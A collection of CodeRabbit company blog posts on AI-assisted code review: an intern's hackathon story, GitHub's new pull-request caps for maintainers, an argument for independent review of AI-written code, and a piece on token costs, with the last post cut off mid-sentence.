CodeRabbit Blog

How a hackathon project turned into my work at CodeRabbit

Ayush Sridhar — Mon, 22 Jun 2026 00:00:00 GMT

In late October, I visited CodeRabbit’s offices to collect my prize from the CalHacks Hackathon. A few months later, I walked into the CodeRabbit office as a SWE intern. That’s the headline. But the part that matters (especially if you’re a junior dev) isn’t “wow, lucky.” It’s the chain of events that made it possible: ![A four-step process: Build something real, Ask for help, Iterate fast, Follow up with proof.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_6866cdc78a.png) This post is for junior developers who are trying to land internships in a market that feels tougher than it should be. I want to share the “unofficial path” that worked for me. The technical project that started it all was: **merj**, an AI-powered merge conflict resolver that used CodeRabbit to give an LLM the missing ingredient it needed to resolve conflicts correctly: semantic intent. [https://youtube.com/shorts/6chYSna0\_QU?si=QooHLMvDyQEvXmHm](https://youtube.com/shorts/6chYSna0_QU?si=QooHLMvDyQEvXmHm) I’ll also share what I’m working on now as an intern. I’m taking the same core idea and turning it into something that can help teams resolve PR merge conflicts with a workflow that fits cleanly into GitHub. ## **October: Hackathon chaos to hackathon WIN** CalHacks is chaotic and energetic in the best way. There’s half-coded demos, half-asleep teams, and a constant stream of “that doesn’t work, gotta fix that.” My friends and I did what a lot of teams do at the start. We brainstormed a bunch of ideas, then walked around talking to sponsors and attendees to see what’s feasible and what would actually be fun to build in a weekend. That’s when we ran into CodeRabbit. At the time, we weren’t thinking “we need a code review product.” We were thinking like hackers: “We want to ship something ambitious in 36 hours and how do we keep it from collapsing under rushed changes?” We realized CodeRabbit could help. And that’s when we met [Hendrik Krack](https://www.linkedin.com/in/climateadvocateaienthusiast/)**,** a developer advocate at CodeRabbit. This is the moment that changed everything. Hendrik didn’t just tell us about the product. He helped us refine the actual project idea in a way that made CodeRabbit genuinely *useful* to the solution. Our early thinking was pretty typical hackathon-thinking: “Throw some context into an LLM and hope it figures it out.” Hendrik pushed us toward a much better approach: “Don’t just give the model raw diffs. Give it semantic understanding of what each person was trying to do.” That might sound obvious in hindsight. But in the middle of a hackathon, it’s easy to default to “LLM magic.” Hendrik helped us see what the LLM would actually *need* to succeed and that became the core of our architecture. Over the course of the hackathon we stayed in contact with Hendrik and also met [Erik Thorelli](https://www.linkedin.com/in/erikthorelli/), the Dev Experience Lead at CodeRabbit. We attended their workshop, asked for input multiple times, and kept tightening our ideas based on what we learned. ![Five men stand by a large window overlooking a body of water and the distant horizon.](https://victorious-bubble-f69a016683.media.strapiapp.com/IMG_4210_3384a47ff8.jpg) By the time presentations came around, we were showing something that had been iterated on with real feedback, and we even got the chance to present directly to them because they were so interested in what we were building. We ended up winning CodeRabbit’s track. The prizes were amazing: Meta AI glasses and a visit to the CodeRabbit office that afternoon. But the part that stuck with me was the irony. I visited the office as a hackathon prize, and I had no idea I’d be working as an intern in that same office less than three months later. ## **What we built at CalHacks: merj, an AI-powered merge conflict resolver** Our project was called **merj** (pronounced like “merge,” but slightly wrong on purpose). **Problem:** Merge conflicts are one of the most tedious, annoying parts of software development. They show up at the worst times. They’re hard to reason about from conflict markers alone, and they’re a perfect example of “high friction, low reward” work. You’re not building something new. You’re just trying to get back to building. So we asked: What if resolving a merge conflict could be as easy as running one command? ### **The user experience** The tool was a CLI, and the entry point was simple: `merge pull` [https://www.youtube.com/watch?v=R1SPVzI1epU](https://www.youtube.com/watch?v=R1SPVzI1epU) Under the hood, it would attempt a normal `git pull`. If Git complained about a merge conflict, merj would trigger a conflict-resolution workflow. We designed it that way intentionally. We didn’t want “another AI chat tool.” We wanted something that fit the existing workflow developers already use. ## **The part that mattered most (and it wasn’t the prize)** Over that weekend, Hendrik helped us refine our concept so we weren’t relying on “LLM magic.” He showed us how to use CodeRabbit’s semantic summaries as an intent layer, and he was generous with his time answering our questions about how CodeRabbit works and how it could integrate into our project. Erik’s workshop helped us understand CodeRabbit more deeply so our integration became less hand-wavy and more real. We kept coming back for feedback, and each time, the project got better. This is one of the most important lessons I’ve taken away as a junior dev: **Asking for help is a skill. And when you do it well, with momentum and clarity, experienced engineers actually want to help.** A good “ask for help” looks like: * “Here’s the goal.” * “Here’s what we built so far.” * “Here’s what isn’t working.” * “Here are two options we’re debating.” * “What would you do next?” That’s how you turn a sponsor booth conversation into a real connection. ## **The follow-up: How a hackathon turned into an internship** The week after CalHacks, I reached out to Hendrik and Erik asking about potential internship opportunities and whether they could help me navigate the process. They connected me with David Loker, CodeRabbit’s VP of Applied AI, and we set up an interview, which felt like a continuation of the hackathon: * I thoroughly explained our project architecture. * We talked about follow-ups and how to improve the product. * We discussed how it might fit within CodeRabbit’s existing product. * We went deeper on technical choices and failure modes. I received an offer the next day. I’m not sharing this to flex. I’m sharing it because it highlights something that matters in today’s environment: It’s easier for people to believe in you when you’ve already shown proof of how you think, build, and iterate. ## **Practical advice for junior devs (what I’d do again)** I want to end with concrete advice, because I wish someone had told me this earlier. ### **1. Build things that force real engineering decisions** Tutorials are fine. But the projects that change your trajectory are the ones with: * Constraints * Tradeoffs * Failure modes * Real integration points Those are the projects that make interviews feel like conversations instead of interrogations. ### **2. Ask for help while you’re still building** Don’t wait until it’s “perfect.” Ask early enough that feedback can change the design. ### **3. Make your ask easy to answer** Respecting someone’s time isn’t about being silent; it’s about being clear. Show: * What you tried * What broke * What you think is happening * What kind of feedback you want ### **4. Follow up with proof, not desperation** “Here’s what I built and what I learned” is memorable. A generic “please give me a chance” message isn’t. ### **5. LeetCode can help you pass gates. Building creates doors.** Interview prep matters, but building impressive things is what gets attention and creates opportunities. ## **The bottom line** I landed an internship with CodeRabbit because I built something real, asked for help early, iterated fast, and followed up with proof. And the wild part is that the loop is continuing. The hackathon project that started as a weekend experiment is now becoming a real product initiative I get to work on as an intern. Don’t just apply harder in isolation if you’re a junior dev trying to stand out in a tough environment. Instead, build something you’re proud of and then get it in front of people who might be interested in it.

The real bottleneck in code review isn't reviewing code, it is understanding it

Brandon Gubitosa — Fri, 19 Jun 2026 00:00:00 GMT

Be honest with yourself for a minute. When was the last time you fully understood a pull request that was not yours in the last quarter? Seriously, did you trace the logic, check the ticket, inspect the edge cases, and think through what would happen in production? Or did you skim, get the gist, look for obvious red flags, and approve because you trusted the author and were slammed with “urgent” reviews. That is the real state of code review on most teams. Engineers have not stopped caring about code quality. The problem is that the volume of code has outpaced the amount of attention and time any human can give it. Larger pull requests sit for days, architectural feedback gets rarer, and careful review turns into pattern matching once the diff gets larger than what one person can realistically hold in their head. Open source maintainers live with this daily now that contributing to projects became cheap, but reviewing code didn’t follow that path. A human still reads every pull request, deciphers what changed, understands why it was built that way and decides if it conflicts with how the rest of the codebase works. That is the reality of the new software development lifecycle (SDLC), reviewing agent generated code is slowing teams down and pushing ROI from coding agents further out. Teams are applying the old review model they used for human-written code to review code written by agents. A human reviewer can only hold so much code, context, and intent in their head at once before review turns into pattern matching. We’ve rebuilt our code review interface for the agentic SDLC to help developers fully understand what is changing, why those changes matter, what the risk is, and what is actually about to ship. ## Reviewing human-written code and AI-generated code are different jobs If you have been reviewing code for the last decade, you know the quiet truth that the process of reviewing code has always been a little broken even before introducing AI to the equation. Code review has always depended on a reviewer reconstructing intent from another person's brain. The author knows why the change exists and what behavior they meant to introduce. The reviewer gets a diff and has to reverse-engineer that logic in their own head before they can even start evaluating whether the change is correct. AI amplifies the bottlenecks in code review across engineering teams. Now, teams are pushing far more code through the same interfaces designed for human-written code in larger and harder to understand diffs, often with less confidence that the author who opened up the pull request even fully understands the impact of the change. That is where teams discover that reviewing human-written code and AI-generated code are different jobs. AI generated code often reflects pattern completion and can miss codebase conventions, constraints, and architectural logic. The failure modes of AI generated code are not subtle. [Our own research](https://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report) found that logic and correctness problems are 75% more common in AI pull requests than in human ones. Security issues can be as high as 2.74x, and readability issues are more than 3x higher. ![Infographic detailing AI's increased security vulnerabilities, including password handling, XSS, and deserialization.](https://victorious-bubble-f69a016683.media.strapiapp.com/ai_makes_security_mistakes_297c14ae1b.png) Those are not the kind of defects you catch by casually scanning a diff and are issues that require deep context, careful reasoning, and time that most reviewers no longer have since the role of senior engineers has shifted to validating intent, pressure-testing risk and deciding whether the change should exist at all. These pressures aren't just limited to human contributions, however. They highlight a universal reality. Human-written code and AI-generated code arrive through different paths, but fail in the same place. Intent is still missing from the code review surface. The real bottleneck in code review, whether the code is human- or AI-generated, is understanding what the change was supposed to do, what constraints mattered, what could break, and whether the final behavior matches the original goal. Code review has always forced people to infer that from a diff, and AI makes the gap far more obvious. ## The code review bottleneck is understanding intent The underlying factor in all of this is that the interface for reviewing code has not kept up with the shift toward agents writing a growing share of code. Current interfaces still assume that showing changed files in order is enough for someone to reconstruct the intent. It was a weak assumption before AI, and it is an even worse one now. For code review to hold up in agentic workflows, it cannot exist in a raw diff viewer. It has to become a system that helps reviewers understand intent, isolate risk, and focus attention where judgment actually matters. In agentic workflows, we must pivot from line-by-line inspection to intent validation. We need to answer: *Did the system build what we meant to build? Does the change respect existing codebase constraints?* This shift is essential because the volume of AI-generated code has long since outstripped our ability to inspect it manually. In order to review code and understand intent better, teams need a verification layer that carries intent forward. It should make the shape of a change legible, connect related work across files, surface the non-obvious risk, and help a reviewer move through a pull request in the order that makes sense instead of the order the filesystem happens to return. This shift matters because the bottleneck in code review has always been understanding intent well enough to judge whether a change is right, whether it is safe, and whether it actually does what the team intended. AI did not change the nature of that bottleneck, it raised the rate of output dramatically and teams now have to understand intent faster than the old review process was ever designed to support. ## Why we redesigned our interface to better understand intent Reviewers still need to see the shape of a change, the order in which they should be read, the dependencies that matter, and the places where human judgement should slow down. When code generation accelerates, code review has to become better at carrying intent forward, otherwise teams do not leverage and just move the bottleneck downstream. That is the direction behind CodeRabbit Review. Instead of leaving a pull request as a flat list of files, it reorganizes the change into logical cohorts and ordered layers, anchors those layers to real code ranges, and adds diagrams when a visual explanation makes the change easier to understand. ![GitHub page displaying a pull request for adding description fields to API reference documentation.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_de49ea1371.png) This means understanding relationships across changed blocks, mapping dependencies, and turning a diff into an explainable walkthrough instead of a pile of lines to review. The goal is not to flood teams with more AI commentary, but to remove the reconstruction step that has made code review slow and fragile for years. Try [CodeRabbit Review](https://www.coderabbit.ai/blog/introducing-atlas-the-first-ai-native-code-review-interface) on the next PR. CodeRabbit Review is free for a limited time for every CodeRabbit user. You can find it by clicking Review Change Stack in the CodeRabbit PR summary comment.

GitHub gives maintainers a throttle for the AI pull request surge

David Kravets — Thu, 18 Jun 2026 00:00:00 GMT

Despite the obituaries for the pull request, it turns out the pull request is alive, loud, and moving faster than the human systems built to review it. That is the real signal behind [GitHub’s announcement](https://github.blog/changelog/2026-06-17-limit-open-pull-requests-for-users-without-write-access/) to give open source maintainers the ability to set caps on how many concurrent pull requests outside contributors can keep open. “Maintainers carry the trust layer of open source. As AI makes it easier to generate contributions, we want to give maintainers more choice in how they receive and review that work,” Ashley Wolf, Director of Open Source at GitHub, tells us about today’s new feature. “Pull requests are far from dead. They are evolving from simple code submissions into richer checkpoints for context, review, and accountability, and our job is to make sure maintainers have the controls they need as that evolution accelerates.” The feature gives repository admins a direct control inside repository settings. Maintainers will be able to set a maximum number of open PRs for users without write access. Once a contributor reaches that limit, another PR waits until one of the existing PRs closes or merges. Trusted contributors can go on a bypass list without receiving full collaborator access. The feature is simple. The signal is significant. GitHub is giving maintainers a throttle for a contribution system running at AI (slop) speed. Camilla Moraes, a GitHub Project Project Manager on Maintainer Wins, says the move is to address the problem of “[AI Slop at Scale](https://github.com/orgs/community/discussions/197319),” and that GitHub has been working with maintainers on a solution to bring them relief. “Earlier this year, we opened a discussion about a trend that’s been making maintainer’s lives harder: a flood of low-quality contributions that existing tools and workflows weren’t built to handle,” she [wrote](https://github.com/orgs/community/discussions/197319) on GitHub. In short, GitHub is adding this control because the pull request queue has become a pressure point in the AI era, where cheap code meets scarce human review. According to GitHub figures shared for this story, site-wide merged pull requests grew from 25 million per month in January 2023 to 90 million per month in March 2026, a 3.6x increase. Commits grew from 389 million per month to 1.4 billion per month, another roughly 3.6x increase. GitHub framed the infrastructure version of this story in April. The company said it began a plan to increase capacity by 10X in October 2025 and, by February 2026, had moved toward a future requiring [30X today’s scale](https://github.blog/news-insights/company-news/an-update-on-github-availability/). GitHub tied that shift to agentic development workflows and said repository creation, pull request activity, API usage, automation, and large-repository workloads are all growing quickly. ![Three line graphs depict accelerating growth in pull requests, commits, and new repositories.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_a323ef8679.png) **Image source: GitHub** The social version of the story feels even more immediate. Maintainers feel the heat first. Wolf described the moment as open source’s “Eternal September.” The company wrote that generative AI makes it easy to produce code, issues, and security reports at scale, and captured the core tension in one clean line. “[The cost to create has dropped but the cost to review has not](https://github.blog/open-source/maintainers/welcome-to-the-eternal-september-of-open-source-heres-what-we-plan-to-do-for-maintainers/).” That line, at its core, explains the new PR cap. ## **A new middle path for maintainers** GitHub already shipped two foundational PR access controls in February. Maintainers can disable pull requests entirely, or [restrict PR creation to collaborators only](https://github.blog/changelog/2026-02-13-new-repository-settings-for-configuring-pull-request-access/). GitHub said those settings give maintainers more control over how repositories accept contributions, especially for mirrors, read-only codebases, and projects that want public code without a public contribution queue. The new PR cap, however, adds a finer, more flexible control. It targets a specific noisy pattern, a small number of users opening many PRs against the same repository in a short period. Moraes [describes](https://github.com/orgs/community/discussions/197319) the cap as “one of the simplest and highest-impact controls” it can ship, because it creates a practical middle ground between fully open PRs and collaborator-only restrictions. That middle ground matters. Open source thrives on porous boundaries. Maintainers also need quiet rooms, clean queues, and reliable signals. A cap lets a maintainer say yes to new contributors while protecting the review lane from a flood. A bypass list lets trusted contributors keep moving. The result is a more textured trust model, warm enough for community and firm enough for scale. ## **The community asked for this** Maintainers and contributors have been asking for more PR control for years, even before the AI-coding wave took off. In a 2021 GitHub Community discussion titled “[Request, Ability to turn off Pull Requests](https://github.com/orgs/community/discussions/8907),” one user wrote that sometimes maintainers “just want to share code and don’t want the burden of maintaining it, triaging issues or pull requests.” The same request said it would be useful to disable PRs the same way projects can disable issues. The AI era sharpened that request into something more urgent. In a 2026 GitHub Community [discussion](https://github.com/orgs/community/discussions/185387) about low-quality contributions, one commenter wrote, “Giving repo owners the ability to ‘rate-limit’ PRs from contributors is probably a good idea.” Another comment described the suspicious pattern directly. “You haven’t contributed to this project before and now you are filling 30 PRs” looked unlike normal human contribution behavior. These examples, [and many others](https://github.com/orgs/community/discussions/185387), all point to the same bright, uncomfortable truth. Creation is abundant. Review is scarce. ## **GitHub is rebuilding the maintainer cockpit** The PR cap sits inside a wider GitHub product push for maintainers. GitHub’s Maintainer Month “Ships for Maintainers” [page](https://maintainermonth.github.com/ships) lists **40** features and updates built for open source maintainers, including **8** in pull requests, **6** in issues, **4** in notifications, and **3** in moderation. Several of those changes clearly map to the PR surge. GitHub moved the global pull requests [dashboard](https://github.blog/changelog/2026-04-23-global-pull-requests-dashboard-moves-to-opt-out-public-preview/) into opt-out public preview. The dashboard gives users a unified place to manage PRs, with filters by organization and repository, saved views, inbox sections for drafts and review needs, unread indicators, and status checks visible from the list view. GitHub [added repository member role labels](https://github.blog/changelog/2026-04-09-repository-member-role-labels-now-in-pull-request-list-view/) directly to public repository PR lists, including labels such as `First-time contributor`, `Contributor`, and `Member`. GitHub said the change helps maintainers triage PRs faster by showing contributor history at a glance. GitHub [redesigned the PR Files changed page](https://github.blog/changelog/2026-03-19-view-code-and-comments-side-by-side-in-pull-request-files-changed-page/) with docked panels so reviewers can keep overview, comments, merge status, and alerts open alongside the diff. The alerts panel surfaces code scanning alerts next to the code review itself. GitHub also added [quick merge-status access inside PRs](https://github.blog/changelog/2026-03-05-quick-access-to-merge-status-in-pull-requests-in-public-preview/), giving reviewers a faster way to spot blockers, missing approvals, and readiness signals. Moderation is getting sharper too. GitHub added a “[Low Quality](https://github.blog/changelog/2026-04-09-new-low-quality-option-in-the-hide-comment-menu/)” option to the Hide comment menu across issues, discussions, pull requests, and commits, saying older categories such as spam and abuse failed to capture the growing volume of unhelpful comments. [Notifications](https://github.blog/changelog/2026-04-09-new-sort-by-control-added-to-notifications/) are getting cleaner. GitHub added oldest-to-newest sorting so maintainers can work through backlogs methodically, and it improved handling for notifications [triggered by spammy repositories](https://github.blog/changelog/2025-12-04-notifications-triggered-by-spam-accounts-are-now-correctly-hidden/) and users. The [roadmap](https://github.com/orgs/community/discussions/197319) keeps going. GitHub says PR archiving is coming soon, giving admins a way to remove low-quality or spammy PRs from the main list while preserving historical context. GitHub also plans issue limits, issue restrictions for collaborators only, more granular interaction limits, and possible global rate limits for users who spray activity across many repositories. Taken together, these changes form a new maintainer cockpit with more filters, signals, throttles and more calm. ## **The pull request is alive** The pull request has always been more than a diff. It is where code meets trust. AI makes that trust work louder and more demanding. A generated PR can look polished, pass tests, and still miss the project’s architecture, taste, history, and intent. A human maintainer still pays the cognitive cost. Every review carries the soft grind of context switching, the sharp smell of risk, and the quiet burden of ownership. GitHub’s new caps acknowledge that reality with welcome clarity. The answer to abundant contribution is better flow control. Open source needs invitation, mentorship, and access. It also needs boundaries sturdy enough to protect the people doing the work. The best version of this future keeps the door open and gives maintainers a handle on the door. The pull request is alive. GitHub is now giving maintainers the throttle they need to keep it somewhat healthy.

The more AI writes the code, the more review needs independence

Yiwen Xu — Wed, 17 Jun 2026 00:00:00 GMT

On June 16, 2026, [SpaceX agreed to buy](https://techcrunch.com/2026/06/16/spacex-to-acquire-cursor-for-60b-in-stock-days-after-blockbuster-ipo/) AI coding start-up Cursor for $60 billion in an all-stock deal. Cursor helps developers write code and also reviews code through Bugbot. Put that inside a broader corporate stack that already owns infrastructure, models, and generation, and the question for engineering teams becomes unavoidable. Should the same AI stack that writes the code also be trusted to review it? In school, we call that grading your own homework, and in software, the stakes are higher. The code may compile, the agent may explain itself, and the reviewer may sound confident, but confidence is not verification. As AI writes more of the code teams ship, an independent reviewer becomes the safeguard that keeps teams moving fast without sacrificing quality. It also brings separation of duties to AI development, making sure the system that helps create the code is not the same one deciding whether it is safe to ship. For enterprise teams, this is a way to get ahead of the governance and regulatory expectations forming around AI-generated software. ## A model is a poor judge of its own work Consolidation in this market is moving quickly, with AI coding platforms adding their own review features. Cursor’s BugBot [defaults to using Composer 2.5](https://cursor.com/blog/bugbot-updates-june-2026) for code review, the same model family used to generate code. The convenience is real, but when the same stack writes and reviews the code, it can carry the same assumptions into both steps, which makes it more likely to repeat the same oversight rather than catch it. [One study](https://arxiv.org/abs/2507.02778) found that large language models exhibiting Self-Correction Blind Spot have a 64.5% average failure rate when asked to correct errors they produced themselves. [A separate analysis](https://arxiv.org/abs/2507.06920) found that generated code passed 9 to 17 percentage points more often when it was tested by models in the same family than when it was tested independently. Models that share training tend to share blind spots and often fall into the Homogenization Trap, so a model checking its own output is inclined to approve it. The volume of AI-generated code makes this harder to ignore. Industry data points to a [14x increase in GitHub commits in 2026](https://daringfireball.net/linked/2026/05/04/commits-on-github-are-up-14x-year-over-year) attributed to AI coding, and a [40% increase in critical issues found in pull requests.](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) There is also a [81% increase in secrets leaked in code,](https://blog.gitguardian.com/the-state-of-secrets-sprawl-2026/) alongside an explainability gap in which AI is outpacing human comprehension of code [by 5 to 7x.](https://byteiota.com/cognitive-debt-ai-coding-agents-outpace-comprehension-5-7x/) Code review functions as the final checkpoint before production, and that checkpoint can’t be trusted when the same model both produces the code and signs off on it. ## Compliance frameworks are moving in this direction Separating the author of a change from its reviewer is not a new idea. It is an established governance practice, borrowed from how finance has handled trust for decades. After the [Enron](https://en.wikipedia.org/wiki/Enron_scandal) and [WorldCom](https://internationalbanker.com/history-of-financial-crises/the-worldcom-scandal-2002/) scandals, where the creator and the reviewer of financial records shared incentives, [Sarbanes-Oxley Act](https://www.sarbanes-oxley-act.com) required companies to separate the external auditor from the accountant. The separation worked because it removed the conflict at the source rather than auditing around it. What reads today as good practice is beginning to look like a requirement. SOC 2, the AICPA framework that many enterprise buyers ask their vendors to meet, addresses the issue. Control CC8.1 governs change management and calls for [Segregation of Duties](https://macpas.com/how-why-segregation-of-duties-is-important-for-change-controls/) (SoD). The principle is that the party which authors a change cannot also approve it and push it to production without independent review. Engineering leaders who decouple authoring from review today are proactively de-risking the AI pipeline ahead of any mandate, and turning a future compliance obligation into a present advantage. This is already appearing in enterprise purchasing conversations. One engineering director at a quality engineering platform put it plainly that their security team “doesn’t feel that using the same tool for coding and PR reviews is a good idea.” An engineering leader at a security company put it even more directly: “We do not necessarily want the AI coding assistant vendor to also be our PR review vendor.” ## How CodeRabbit delivers independent, explainable AI code review with the best ROI ### Built to review independently By nature, CodeRabbit separates the writer from the reviewer. It's platform agnostic and operates independently of coding agents, running alongside tools like Cursor, Codex, Claude Code, and Copilot rather than being bundled into the same generation stack. Under the hood, CodeRabbit uses an ensemble of models instead of relying on a single model for the entire review. Compact models handle context distillation, while larger multi-step reasoning models are reserved for more complex tasks. Multiple models work together, each focused on the task it is best suited to do. This design also improves resilience. If one model provider is degraded or unavailable, reviews can continue through other models, reducing dependence on a single model provider. [Cost efficiency](https://www.coderabbit.ai/blog/out-with-tokenmaxxing-in-with-mergemaxxing) is another benefit of the multi-model approach, giving engineering teams the best ROI in code review. Teams get high-performance review, predictable seat-based pricing, and flexible usage-based add-ons for high-throughput agentic loops. ![Diagram showing CodeRabbit's independent code review system using an ensemble of AI models.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_a75ce4ade4.png) ### The purpose-built and explainable review layer teams can trust As more code is generated by AI, explainability is becoming the missing layer in code review. CodeRabbit has long provided structured summaries and walkthrough comments for every pull request. The recently launched [CodeRabbit Review](https://www.coderabbit.ai/blog/introducing-atlas-the-first-ai-native-code-review-interface) feature takes explainability further by turning the diff into a guided, layer-by-layer walkthrough. ![Code editor shows a diff view of a Kotlin configuration file with highlighted code changes.](https://victorious-bubble-f69a016683.media.strapiapp.com/Code_Peek_602a3cf6b6.png) It identifies semantic relationships between changes, groups related code blocks into logical cohorts, and orders those cohorts by dependency. Instead of reviewing a PR file by file, human reviewers can follow the change in the order the system actually fits together. It is like having a senior engineer walk you through the PR. ## What the Cursor acquisition means for engineering leaders The Cursor deal makes the trust problem obvious. More of the software development lifecycle is being pulled into the same vendor stack, from writing code to reviewing it. That may be convenient, but it raises a question every engineering team should ask. Should the same system that helped create the code also decide whether it is safe to ship? Independent review exists for a reason. Models can miss their own mistakes, and models from the same family tend to share the same blind spots. Engineering leaders already identified the risk, and established change-management practices also recognize the value of separating the author of a change from its reviewer. CodeRabbit gives teams that independent review layer, combined with a specialized, feature-rich platform for explainable code review. Teams can validate AI-generated and human-written code, understand why issues were flagged, catch defects before production, and ship faster with confidence. Proactively de-risk your AI development pipeline with independent, explainable code review. CodeRabbit comes with a rich feature set, enterprise controls, and governance built in, battle-tested across more than 15,000 engineering teams. [Talk to our sales team](https://www.coderabbit.ai/contact-us/sales) to learn more.

Out with Tokenmaxxing. In with Mergemaxxing

Yiwen Xu — Tue, 16 Jun 2026 00:00:00 GMT

[Token prices fell 98% since late 2022 yet enterprise AI bills tripled](https://thenextweb.com/news/token-prices-fell-98-enterprise-ai-bills-tripled-now-the-industry-wants-a-standards-body-to-explain-why). Uber burned through its entire 2026 AI coding budget by April per [TechCrunch](https://techcrunch.com/2026/06/02/uber-caps-employee-ai-spending-after-blowing-through-budget-in-four-months/). [Gartner](https://www.gartner.com/document-reader/document/7280630) predicts that by 2027, 40% of enterprises using consumption-priced AI coding tools will face unplanned costs exceeding twice their expected budgets, increasing demand for structured cost oversight and optimization strategies. For a while, the industry treated token consumption as a proxy for ambition: the more your agents burned, the more "AI-forward" you were. This logic is flawed as tokens are an input, not an outcome. [Goodhart’s Law](https://en.wikipedia.org/wiki/Goodhart%27s_law) applies here, as once token consumption becomes the target, it stops being a useful measure of effectiveness. The industry learned this lesson once before with [lines of code](https://getdx.com/blog/lines-of-code/) as a metric to measure developer productivity. Companies are now relearning it with tokens, and the focus shifts towards measuring outcomes per dollar spent. Nowhere does this matter more than in AI code review. The outcome you are buying is not tokenmaxxing, it is high-quality code, merged and shipped with confidence. That means the system you choose should be optimized for what we call merge maxxing: maximizing merge pull request velocity without compromising quality or cost. Most systems are not built to optimize quality and cost at the same time. ## Quality at any cost: The brute-force approach One approach to AI code review is to optimize for quality by maximizing token spend. For example, at launch, [Cursor's Bugbot](https://cursor.com/blog/building-bugbot) ran eight parallel review passes over every PR with majority voting to filter noise. Today it's a fully agentic design where the model "decides where to dig deeper," pulling in whatever context it wants at runtime, steered by prompts that encourage it to "investigate every suspicious pattern." The post details 40 experiments hill-climbing on quality metrics. What it never mentions is token cost. In other words, rather than being smart about it, they've decided to just throw more horsepower at it. The approach works and it produces precise reviews. But when the agent decides how much to explore, the cost of every review is often unbounded. Cursor’s Bugbot recently started to [charge on consumption](https://cursor.com/blog/may-2026-bugbot-changes), and It charges $1.00-$1.50 per run, depending on PR size and complexity. A community member estimates [$7–$10.50 per PR](https://forum.cursor.com/t/the-new-usage-based-bugbot-pricing-punishes-iterative-workflows-and-power-users/161134), which lands a developer shipping 15–20 PRs a month at $105–$210 per user, per month. The inefficiency is passed to you. ## A general harness: Overbuilt for review, billed by the token The other common approach points to a general-purpose frontier coding agent at your PR. The harness is built to do anything, including writing features, building spreadsheets, and drafting docs. In code review, that flexibility becomes overhead, and the system burns significant tokens rediscovering context that a purpose-built reviewer would already know. The result is an expensive review with potentially fewer bugs detected. An example of this is using Claude Code Review for code reviews which [average $15–$25 per PR](https://code.claude.com/docs/en/code-review), billed on token usage and scaling with PR complexity. At typical velocity, that's $225–$500 per user, per month. And the incentive structure is worth noticing: when the vendor bills by the token, every token the harness burns is revenue. ### Both roads lead to rationed reviews The hidden cost of these tools is behavioral, and over time it becomes a quality problem. When review is metered, spend controls become quality controls. These tools often let teams configure when reviews trigger, how often they run, and how much effort the reviewer applies. But, the moment you start adjusting review behavior to manage a bill, you are also deciding which code gets scrutiny. Your team might review the “high-stakes” PRs, skip the re-review after revisions, and think twice before pushing another iteration. This does not mean every skipped review ships a bug but fewer issues are caught early, when they are cheapest to fix. Rationing review pushes that cost downstream, closer to production, where defects are harder and more expensive to fix. ## CodeRabbit: Relentlessly optimizing both quality and cost We do not believe that teams should have to choose between quality and cost. A well-built review system should deliver both and be efficient and accurate. Every irrelevant token in a model's context window dilutes its attention and raises the odds it misses a real bug. The discipline that strips waste out of the system is the same discipline that makes reviews accurate. In a [hands-on evaluation by Signal65](https://signal65.com/research/ai/evaluating-ai-code-review-tools-a-real-world-bug-detection-study/) testing five AI review tools against real historical bugs across six open-source repos, CodeRabbit found the most critical bugs such crashes, security vulnerabilities, data loss at 95.88% precision. It was the only tool to lead on both dimensions simultaneously. The nearest competitor on precision found 28% fewer critical bugs. [Martian’s evaluation](https://codereview.withmartian.com) showed the same pattern. CodeRabbit leads on F1 score and, more importantly for code review, recall: the measure of how many real issues a system catches. ![Scatter plot: CodeRabbit surpasses competitors in AI code review precision and critical bug detection.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_8d5d48b084.png) Every PR gets that same caliber of review, giving teams the confidence to merge and ship. Under the hood, that outcome comes from two approaches (token and cost optimization) and three key technologies (Context discipline, Smart LLM Routing, and Prompt Caching) working together. ![CodeRabbit's optimization diagram, detailing token, cost, context discipline, LLM routing, and prompt caching.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_858d76639c.png) ### Token optimization: Engineering the context Better reviews come from [better-selected context](https://www.coderabbit.ai/blog/context-engineering-ai-code-reviews). This is known as context discipline, a subset of [context engineering](https://www.coderabbit.ai/blog/the-art-and-science-of-context-engineering). CodeRabbit has built this technology into its context engine, avoiding overwhelming the LLM with irrelevant information or missing the critical context that would make the review more accurate. **Distillation at every layer.** Every context source, including the code graph, MCP integrations, documentation, coding guidelines, learnings, and static analysis output pass through a processing layer that extracts only what's relevant to the PR at hand. CodeRabbit deliberately spends a majority of its input tokens in this enrichment phase to give the reviewer better context. A function your PR calls might be hundreds of lines long, but the review agent may only need a precise summary of what it does. **Domain expertise instead of open-ended exploration.** At CodeRabbit, we approach review as experienced engineers: we know the baseline signals a good reviewer needs before it starts reasoning. So we do not leave that discovery entirely to the agent. CodeRabbit uses a [hybrid AI approach](https://www.coderabbit.ai/blog/pipeline-ai-vs-agentic-ai-for-code-reviews-let-the-model-reason-within-reason) to code review, combining deterministic analysis with agentic reasoning. For every PR, it builds a deterministic code graph for every PR, so by the time the agentic steps begin, the agent already understands the architecture, the call paths, and where the relevant code lives. Its discovery path is narrow by design as we tell it where to start, so it does not have to spend extra tokens figuring out how to find out. ![CodeRabbit's diagram contrasts an agent exploring a maze with a clear, mapped path.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_a61208e390.png) ### Cost optimization: Engineering the spend Cost optimization is making every remaining token as cheap as possible without losing quality. **Smart LLM Routing** CodeRabbit has a dedicated engineering team continuously evaluating and benchmarking models to understand where each one improves the system, where it simply adds cost, and where a smaller model can do the job better. Compact models handle distillation, while the largest multi-step reasoning models are reserved for the review agent, where deeper analysis pays off. Larger models are not automatically better, and when a task does not require that level of reasoning, they can add latency, noise, and unnecessary complexity. Per-task routing keeps each part of the system matched to the work it is best suited to do, improving both efficiency and review quality. **Intelligent incremental reviews using Prompt Caching** CodeRabbit treats every follow-up review as incremental. Unchanged code is not reviewed from scratch, and stable parts of long prompts can be cached instead of present on every iteration. This is also known as Prompt Caching and allows the reviewer to focus its attention, reasoning, and tokens on what actually changed. ### Purpose-built efficiency, passed on to customers The token and cost optimization are passed onto our customers. Many teams start by building their own AI review systems and do not realize how quickly token spend adds up, especially when a frontier model is used for every task in the review pipeline. Some customers tell us they are already spending thousands of dollars a 